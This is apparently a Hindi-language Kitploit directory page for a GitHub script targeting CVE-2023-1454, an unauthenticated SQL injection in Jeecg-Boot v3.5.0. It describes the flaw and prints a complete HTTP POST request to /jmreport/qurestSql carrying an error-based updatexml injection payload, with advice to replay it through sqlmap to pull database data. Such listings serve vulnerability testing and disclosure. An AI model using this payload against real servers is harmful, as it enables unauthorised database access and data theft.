Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-1454 — CVE-2023-1454漏洞检测脚本 | Kitploit
उपकरण/GitHubGitHub/bugfor-pings/cve-2023-1454
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubbugfor-pings/cve-2023-1454

CVE-2023-1454

CVE-2023-1454漏洞检测脚本

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-1454

CVE-2023-1454 भेद्यता पहचान स्क्रिप्ट

यह लेख केवल संदर्भ के लिए है। बिना अधिकार के कृपया इस लेख में दी गई तकनीकी सामग्री और उपकरणों का उपयोग किसी भी कंप्यूटर सिस्टम में घुसपैठ करने के लिए न करें। इस लेख में दी गई जानकारी के कारण होने वाले प्रत्यक्ष या अप्रत्यक्ष परिणामों और हानियों की जिम्मेदारी पूरी तरह उपयोगकर्ता की है।

परिचय Jeecg-Boot कोड जनरेटर पर आधारित एक लो-कोड डेवलपमेंट प्लेटफॉर्म है। यह कोड जनरेटर, टेम्पलेट इंजन, अनुमति प्रबंधन, डेटा शब्दकोश, डेटा आयात/निर्यात आदि जैसी कई सुविधाएँ प्रदान करता है, जो डेवलपर्स को तेजी से एंटरप्राइज़-स्तरीय एप्लिकेशन बनाने में मदद करता है।

भेद्यता अवलोकन एंटरप्राइज़ वेब एप्लिकेशन के लिए जावा लो-कोड प्लेटफॉर्म Jeecg-Boot (v3.5.0) ने jimureport-spring-boot-starter-1.5.6.jar का उपयोग किया है। Jeecg-Boot में विशेष वर्णों को फ़िल्टर करने में खामी है। Vue3 के साथ फ्रंट-एंड v3.5.0 संस्करण की शर्तों के तहत, Jeecg में एक अनधिकृत SQL इंजेक्शन है। भेद्यता बिंदु /querySql पथ में मौजूद है, जब इसे कॉल किया जाता है तो id पर SQL कोई प्रसंस्करण नहीं किया जाता है, जिससे सीधे एरर-बेस्ड इंजेक्शन किया जा सकता है। बिना प्रमाणीकरण के एक दूरस्थ हमलावर विशेष स्ट्रिंग तैयार करके लक्ष्य डेटाबेस की संवेदनशील जानकारी प्राप्त कर सकता है।

प्रभावित संस्करण प्रभावित संस्करण: Jeecg-Boot = v3.5.0

डेटा पैकेट को txt के रूप में सहेजें और sqlmap का उपयोग करके डेटा प्राप्त किया जा सकता है

root@kitploit:~
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

टूल डाउनलोड करें